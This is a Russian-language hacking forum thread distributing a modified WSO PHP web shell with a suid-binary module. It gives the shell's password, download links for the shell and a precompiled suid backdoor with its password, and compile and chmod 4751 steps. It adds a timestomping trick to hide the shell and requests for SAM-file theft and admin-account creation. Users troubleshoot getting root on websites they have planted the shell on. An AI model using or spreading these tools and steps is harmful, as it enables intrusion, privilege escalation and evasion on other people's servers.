Небезизвестный шелл WSO с добавлением модуля для работы с Suid'никами.

Модификация изначально писалась под собственные нужды, но решил её выложить, так как данная модификация может пригодиться другим пользователям.

На данный момент большинство пользуется этой наработкой: http://cyberguru007.blogspot.com/2011/07/wso.html

Но в ней очень много больших минусов .

Модификация:

• Шелл находиться исключительно в одном файле, не требуется создание нескольких файлов.
  
• Путь к Suid'нику и пароль к нему не прописан в файле - его можно указать прямо в шелле и менять не модифицируя исходный код.
  
• Вся необходимая информация храниться в COOKIE, при просмотре коде невозможно определить местоположение суидника.
  
• Шелл защищён паролем - после ввода пароля вы получаете обычный доступ, суидник нужно указать отдельно.
  
• Исправлены глюки при Upload'е, изменении настроек - теперь можно загружать файлы, менять кодировку, AJAX режим можно не переключаюсь к обычной работе.
  
• Присутствует возможность проверки работоспособности суидника до подключения шелла.
  
• Передача данных происходит через встроенную функцию wsoEx.

Скрин:

http://i045.radikal.ru/1108/75/cbbac301dabd.png

http://s51.radikal.ru/i132/1108/30/85c6f414daa8.png

Данная утилита предоставляет веб-интерфейс для удаленной работы c операционной системой и ее службами/демонами.

Использование данного продукта в незаконных целях грозит уголовной ответственностью.

Код в аттаче . Модификация писалась для личного использования, что возможны глюки.

Пароль - root.

Сделай еще в запакованном виде

имхо и без этого можно было обойтись, просто немного модифицируя wsoEx

хотя, посмотрим..

любой труд нужно оценить

Скачать запакованную версию: http://zalil.ru/31520955

Если кому то нужно добавить ещё некоторые возможности - пишите, сделаю.

UDP:

Под рукой нет винды

сделай поддержку WIN

вкладку, где элементарным нажатием клавиши, можно было создать админа с правами на удаленное подключение.

кнопку на скачивание SAM файла

и т.п. для ВЫНей.

чтобы уже совсем облениться и не писать вручную net user /ADD =)))))))

отправка GET/POST запросов, с поправкой хидера

реализовать думаю лучше через сокеты, не везде есть курл

как суидник добавлять?

Например DDOS из армии шеллов)))

А так вещь вообще действительно полезная, например для анонимной работы с дырами на других сайтах и тд...

я вот тока заметил

а что означает слово Modificed?

есть слова Modified, и Modificated

а вот чо значит modificed, я не понял

Дополню: Шелл должен иметь как можно больше возможностей, и в тоже время иметь компактный размер. добавлять всё что не попадает под эту категорию не надо.

Всё что считаю нужным добавлю как будет время.

Тема перенесена в Уязвимости по моей просьбе.

Я делал это. Выложу свой вариант, может пригодится. Шелл тачит себя датой изменения соседнего файла, а если файла нету, то датой изменения соседней директории. Потом находит в директории шелла время модификации, которое произошло максимально недавно, и тачит директорию этой датой.

Только это сделано в оригинальном WSO 2.5, а не в модификации из первого поста.

Запускается нажатием на Magic Touch в менюшке, сам код лежит в функции actionMagicTouch.

[PHP]
PHP:
[COLOR="#000000"]';

$content=php_strip_whitespace('in.txt');

$content=trim(preg_replace([COLOR="#DD0000"]'/

При использовании Suid на FreeBSP возникает ошибка Query did not return anything

Так же при скачивании файлов с данной модификации, так же возникают ошибки

Query did not return anything - Эта ошибка возникает когда функции system, exec(Добавил, поскольку раньше в таком случае ничего не возвращалось)... Запрещены или ничего не возвращают. Проверьте, работают ли они.

Если да - будем разбираться.

Они работают, но всё ровно возникает ошибка при использовании Suid.

из phpinfo видно что работают:

Disabled PHP Functions: none

http://i037.radikal.ru/1108/45/344f4e9f4af8.jpg

После нажатия на кнопку YES, вылетает эта ошибка

Возможно не найден php интерпретатор, попробуй выполнить в консоли:

Работать будет/не будет - Пиши в ПМ.

А у вас есть ICQ или какой либо контакт? За доработку скрипта готов буду заплатить...

Платно не работаю. Доработанный скрипт прикрепил в первом посте. Теперь существует возможность указать путь к php интерпретатору.

Выложили бы сам суидник еще.

Using: ./suid cool_hack id

[path] [password] [command]

Пароль, разумеется можно изменить. В сурсе видно где

Скомпилируй (хоть на том же шелле с gcc) и используй.

Ну и, разумеется, не забывай уже бинарнику добавлять suid-бит (к примеру chmod 4751 suidfilename).

P.S.:

Скомпилированный суидник с паролем 112s233: http://rghost.ru/19777451

расскажите нубу, вообще для чего это добавление

что оно дает? :d

Установленный suid-бит позволяет выполнять файл от имени владельца файла, а не текущего юзера. Т.е. если дать суиднику права root'a, то можно будет выполнять команды от имени root'a с любого юзера.

Ну и следовательно модификация, чтобы более удобно использовать суидник (сохраняя графическую оболочку web-shell'a), а не просто выполнение команд.

На вин все неправильно работает

WSO не правильно работают на вин ОС, лучше бы это поправили.

Спасибо, сейчас скомпилил, залив на ftp одного сайта(владелец user), сделал chmod 4755, зашел через вебшелл(права apache) - попробовал выполнить суидник - права показываются как апачевские.

Естественно, предварительно я посмотрел в /etc/passwd какие uid и gid у юзверя моего ftp, которые я вписал вместо рутовских нулей.

Почему так?

Что именно?

На вин права не правильно отображаються, а именно функция:

Багфикс при котором работает правильно

http://www.keep2.me/files/e4b18a2e046706d5e6e8c14f238b05e4/23.11.15-30.08-1278x260.jpg

вот тут у меня юзер

antidonat

а с помощью этого можно сделать другой типа и посмотреть закрытые разделы?

если не с помощью этого. то как?

Если прорутать, то да.

не могу найти php интепритатор (( помогите плз как его найти ( freebsd 7.0

Смотрим вывод ps aux - Вообще безпалива!!1

А так в принципе норм...

Подскажите пожалуйста. Я использую шел (из первого поста ) + этот суидник ( пост 20 ( Скомпилированный суидник с паролем 112s233: http://rghost.ru/19777451 ) )...

Но у меня не получается зайти по рутом, я почему - то захожу под 33 ( www-data ) Group: 33 ( www-data ).

Подскажите, в чём проблема?

P.S. Ввожу так:

Suid: ./suid

Password: 112s233

Php: /usr/bin/php

На суидник необходимо установить suid bit.

Установлено: 4751

И ничего не выходит большинство команд не срабатывает, директорий не открывается ;(

В первом посте выложена версия в которой невозможно указать путь к PHP. Если это важно выложите версию где это можно зделать.

Php: /usr/bin/php

а без этого у меня ошибка вылезает: Query did not return anything

Are you sure you want to save changes?

делаю вот так:

Suid: ./suid

Password: 112s233

что неправильно?

или насколько я понимаю что не везде можно получить root шелл?

поиск пути до интерпретатора php в шелле:

whereis php

не могу пробить

объясните пож. все сделал нормально нажал чудо кнопку и:

http://imglink.ru/pictures/04-10-11/...b6bd35a904.jpg

это значить не пробить.(уже штук на 6 сайтах пробовал

то же самое )

Кого не пробить ?

Что у тебя за "./" в первой строке ? это тебе что консоль ?

в первой строке указуется полный серверный путь к суидному файлу...

Пример:

/tmp/suid

P.S. в 20-м посте этой темы, Tigger показал как использовать суидный файл в консоли шела.

Помимо суидного бита нужно что бы у файла овнер был root. Иначе толк от суидника никакой)))

При попытке редактировать файл, часто пишет.

Соединение было сброшено....

или выкидывает на каталог с файлами а файл не сохраняет.

КАкой пасс для входа в шелл?